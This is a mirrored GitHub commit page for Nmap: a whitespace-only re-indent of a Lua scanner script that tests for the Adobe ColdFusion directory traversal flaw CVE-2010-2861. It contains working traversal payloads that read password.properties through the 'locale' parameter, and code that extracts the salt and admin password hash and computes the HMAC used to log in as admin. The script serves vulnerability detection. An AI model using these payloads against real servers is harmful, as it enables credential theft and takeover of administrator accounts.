mirror of
https://github.com/nmap/nmap.git
synced 2025-12-25 08:59:01 +00:00
Re-indent some scripts. Whitespace-only commit
https://secwiki.org/w/Nmap/Code_Standards
This commit is contained in:
dmiller
@@ -60,80 +60,80 @@ portrule = shortport.http
|
||||
action = function(host, port)
|
||||
|
||||
local vuln = {
|
||||
title = 'Adobe ColdFusion Directory Traversal Vulnerability',
|
||||
state = vulns.STATE.NOT_VULN, -- default
|
||||
IDS = {CVE = 'CVE-2010-2861', OSVDB = '67047'},
|
||||
description = [[
|
||||
title = 'Adobe ColdFusion Directory Traversal Vulnerability',
|
||||
state = vulns.STATE.NOT_VULN, -- default
|
||||
IDS = {CVE = 'CVE-2010-2861', OSVDB = '67047'},
|
||||
description = [[
|
||||
Multiple directory traversal vulnerabilities in the administrator console
|
||||
in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the
|
||||
locale parameter]],
|
||||
references = {
|
||||
'http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking',
|
||||
'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861',
|
||||
'http://osvdb.org/67047',
|
||||
'http://www.nessus.org/plugins/index.php?view=single&id=48340',
|
||||
},
|
||||
dates = {
|
||||
disclosure = {year = '2010', month = '08', day = '10'},
|
||||
},
|
||||
}
|
||||
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
|
||||
references = {
|
||||
'http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking',
|
||||
'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861',
|
||||
'http://osvdb.org/67047',
|
||||
'http://www.nessus.org/plugins/index.php?view=single&id=48340',
|
||||
},
|
||||
dates = {
|
||||
disclosure = {year = '2010', month = '08', day = '10'},
|
||||
},
|
||||
}
|
||||
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
|
||||
|
||||
-- Function to do the look up and return content
|
||||
local grabAndGrep = function(page)
|
||||
-- Do the HTTP GET request for the page
|
||||
local response = http.get(host, port, page)
|
||||
-- Check to see if we get a good page returned
|
||||
-- Is there no response?
|
||||
if ( not(response.status) ) then
|
||||
return false, "Received no response from HTTP server"
|
||||
end
|
||||
-- Function to do the look up and return content
|
||||
local grabAndGrep = function(page)
|
||||
-- Do the HTTP GET request for the page
|
||||
local response = http.get(host, port, page)
|
||||
-- Check to see if we get a good page returned
|
||||
-- Is there no response?
|
||||
if ( not(response.status) ) then
|
||||
return false, "Received no response from HTTP server"
|
||||
end
|
||||
|
||||
-- Is the response not an HTTP 200 code?
|
||||
if ( response.status ~= 200 ) then
|
||||
return false, ("The server returned an unexpected response (%d)"):format(response.status )
|
||||
end
|
||||
-- Is the response not an HTTP 200 code?
|
||||
if ( response.status ~= 200 ) then
|
||||
return false, ("The server returned an unexpected response (%d)"):format(response.status )
|
||||
end
|
||||
|
||||
-- Now check the body for our strings
|
||||
if ( response.body ) then
|
||||
local saltcontent = response.body:match("salt.*value=\"(%d+)")
|
||||
local hashcontent = response.body:match("password=(%x%x%x%x+)") --Extra %x's needed or it will match strings that are not the long hex password
|
||||
-- Now check the body for our strings
|
||||
if ( response.body ) then
|
||||
local saltcontent = response.body:match("salt.*value=\"(%d+)")
|
||||
local hashcontent = response.body:match("password=(%x%x%x%x+)") --Extra %x's needed or it will match strings that are not the long hex password
|
||||
|
||||
-- If a page has both the salt and the password in it then the exploit has been successful
|
||||
if ( saltcontent and hashcontent ) then
|
||||
vuln.state = vulns.STATE.EXPLOIT
|
||||
-- Generate HMAC as this is what the web application needs for authentication as admin
|
||||
local hmaccontent = stdnse.tohex(openssl.hmac('sha1', saltcontent, hashcontent)):upper()
|
||||
--return true, ("\n\tHMAC: %s\n\tSalt: %s\n\tHash: %s"):format(hmaccontent, saltcontent, hashcontent)
|
||||
local result = {
|
||||
("HMAC: %s"):format(hmaccontent),
|
||||
("Salt: %s"):format(saltcontent),
|
||||
("Hash: %s"):format(hashcontent)
|
||||
}
|
||||
return true, result
|
||||
end
|
||||
end
|
||||
return false, "Not vulnerable"
|
||||
end
|
||||
-- If a page has both the salt and the password in it then the exploit has been successful
|
||||
if ( saltcontent and hashcontent ) then
|
||||
vuln.state = vulns.STATE.EXPLOIT
|
||||
-- Generate HMAC as this is what the web application needs for authentication as admin
|
||||
local hmaccontent = stdnse.tohex(openssl.hmac('sha1', saltcontent, hashcontent)):upper()
|
||||
--return true, ("\n\tHMAC: %s\n\tSalt: %s\n\tHash: %s"):format(hmaccontent, saltcontent, hashcontent)
|
||||
local result = {
|
||||
("HMAC: %s"):format(hmaccontent),
|
||||
("Salt: %s"):format(saltcontent),
|
||||
("Hash: %s"):format(hashcontent)
|
||||
}
|
||||
return true, result
|
||||
end
|
||||
end
|
||||
return false, "Not vulnerable"
|
||||
end
|
||||
|
||||
local exploits = {
|
||||
['CFusionMX'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties%00en',
|
||||
['CFusionMX7'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties%00en',
|
||||
['ColdFusion8'] = '..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en',
|
||||
['JRun4\\servers'] = '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties%00en',
|
||||
}
|
||||
local exploits = {
|
||||
['CFusionMX'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties%00en',
|
||||
['CFusionMX7'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties%00en',
|
||||
['ColdFusion8'] = '..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en',
|
||||
['JRun4\\servers'] = '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties%00en',
|
||||
}
|
||||
|
||||
local results = {}
|
||||
for prod, exploit in pairs(exploits) do
|
||||
local status, result = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=' .. exploit)
|
||||
if ( status or ( not(status) and nmap.verbosity() > 1 ) ) then
|
||||
if ( "string" == type(result) ) then
|
||||
result = { result }
|
||||
end
|
||||
result.name = prod
|
||||
table.insert(results, result )
|
||||
end
|
||||
end
|
||||
vuln.extra_info=stdnse.format_output(true, results)
|
||||
return vuln_report:make_output(vuln)
|
||||
local results = {}
|
||||
for prod, exploit in pairs(exploits) do
|
||||
local status, result = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=' .. exploit)
|
||||
if ( status or ( not(status) and nmap.verbosity() > 1 ) ) then
|
||||
if ( "string" == type(result) ) then
|
||||
result = { result }
|
||||
end
|
||||
result.name = prod
|
||||
table.insert(results, result )
|
||||
end
|
||||
end
|
||||
vuln.extra_info=stdnse.format_output(true, results)
|
||||
return vuln_report:make_output(vuln)
|
||||
end
|
||||
|
||||
Reference in New Issue
Block a user